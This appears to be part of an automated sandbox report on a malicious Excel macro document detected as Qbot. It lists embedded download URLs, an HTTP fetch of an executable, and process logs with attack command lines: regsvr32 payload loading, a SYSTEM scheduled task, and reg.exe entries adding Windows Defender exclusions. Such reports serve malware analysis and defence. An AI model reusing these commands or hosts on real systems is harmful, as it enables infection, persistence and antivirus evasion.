                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj
                          File Type: data
                          Stream Size: 97
                          Entropy: 3.61064918306
                          Base64 Encoded: False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame
                          File Type: ASCII text, with CRLF line terminators
                          Stream Size: 302
                          Entropy: 4.65399600072
                          Base64 Encoded: True
                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/f
                          File Type: data
                          Stream Size: 226
                          Entropy: 2.95233038999
                          Base64 Encoded: False
                          Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/o
                          File Type: data
                          Stream Size: 272
                          Entropy: 3.65039542802
                          Base64 Encoded: True
                          Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 8 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a 1 . . . ( . ( . . . . . . . h t t p : / / 9 4 . 1 4 0 . 1 1 2 . 1 2 6 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 4 1 . 2 7 . 2 1 3 / . . . . . . . . . . . . . . 5 . . . . . . .
                          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          File Type: data
                          Stream Size: 4469
                          Entropy: 4.43292705507
                          Base64 Encoded: False
                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0
                          File Type: data
                          Stream Size: 2476
                          Entropy: 3.52262448927
                          Base64 Encoded: False
                          Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . a . X P B
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1
                          File Type: data
                          Stream Size: 146
                          Entropy: 1.48909835582
                          Base64 Encoded: False
                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2
                          File Type: data
                          Stream Size: 170
                          Entropy: 1.65437585425
                          Base64 Encoded: False
                          Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3
                          File Type: data
                          Stream Size: 156
                          Entropy: 1.63365900945
                          Base64 Encoded: False
                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                          Stream Path: _VBA_PROJECT_CUR/VBA/dir
                          File Type: data
                          Stream Size: 1073
                          Entropy: 6.68948856439
                          Base64 Encoded: True
                          Data ASCII:. - . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . T . I c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D

                          Network Behavior

                          Snort IDS Alerts

                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                          09/28/21-22:08:33.756680 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22
                          09/28/21-22:08:36.768759 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22
                          09/28/21-22:08:42.780833 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22
                          09/28/21-22:08:54.828724 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22
                          09/28/21-22:08:57.840746 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22
                          09/28/21-22:09:03.872526 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22

                          Network Port Distribution

                          TCP Packets

                          Timestamp | Source Port | Dest Port | Source IP | Dest IP

                          HTTP Request Dependency Graph

                          • 190.14.37.187

                          HTTP Packets

                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.22 | 49165 | 190.14.37.187 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                          Timestamp | kBytes transferred | Direction | Data
                          Sep 28, 2021 22:07:47.158303976 CEST | 0 | OUT | GET /44467.9218096065.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 190.14.37.187
                          Connection: Keep-Alive
                          Sep 28, 2021 22:07:48.191482067 CEST | 1 | IN | HTTP/1.1 200 OK
                          Server: nginx
                          Date: Tue, 28 Sep 2021 20:07:48 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 259072
                          Connection: keep-alive
                          X-Powered-By: PHP/5.4.16
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: no-cache, no-store, must-revalidate
                          Content-Disposition: attachment; filename="44467.9218096065.dat"
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a!0'0p`'|p'`'.textj `.edatap0@@.data@`@.data0$Ph|@.rdatatn`'@.rsrcp'@@


                          Code Manipulations

                          Statistics

                          Behavior

                          System Behavior

                          General

                          Start time:22:07:20
                          Start date:28/09/2021
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                          Imagebase:0x13f090000
                          File size:28253536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:22:08:52
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd.red
                          Imagebase:0xff540000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:22:08:53
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -silent ..\Drezd.red
                          Imagebase:0xb90000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.617600278.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.615656945.00000000003D0000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:moderate

                          General

                          Start time:22:08:56
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0x260000
                          File size:2972672 bytes
                          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.881366079.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:22:08:58
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd1.red
                          Imagebase:0xff540000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:22:08:58
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                          Imagebase:0x30000
                          File size:179712 bytes
                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:22:08:58
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd2.red
                          Imagebase:0xff540000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:22:09:00
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xff120000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:22:09:01
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xf10000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.634139082.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.632447302.00000000002A0000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:moderate

                          General

                          Start time:22:09:03
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0x260000
                          File size:2972672 bytes
                          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.881374188.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:22:09:05
                          Start date:28/09/2021
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                          Imagebase:0xff5d0000
                          File size:74752 bytes
                          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:22:09:07
                          Start date:28/09/2021
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0'
                          Imagebase:0xff0c0000
                          File size:74752 bytes
                          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:22:10:00
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xffd60000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:22:10:00
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xe40000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Disassembly

                          Code Analysis
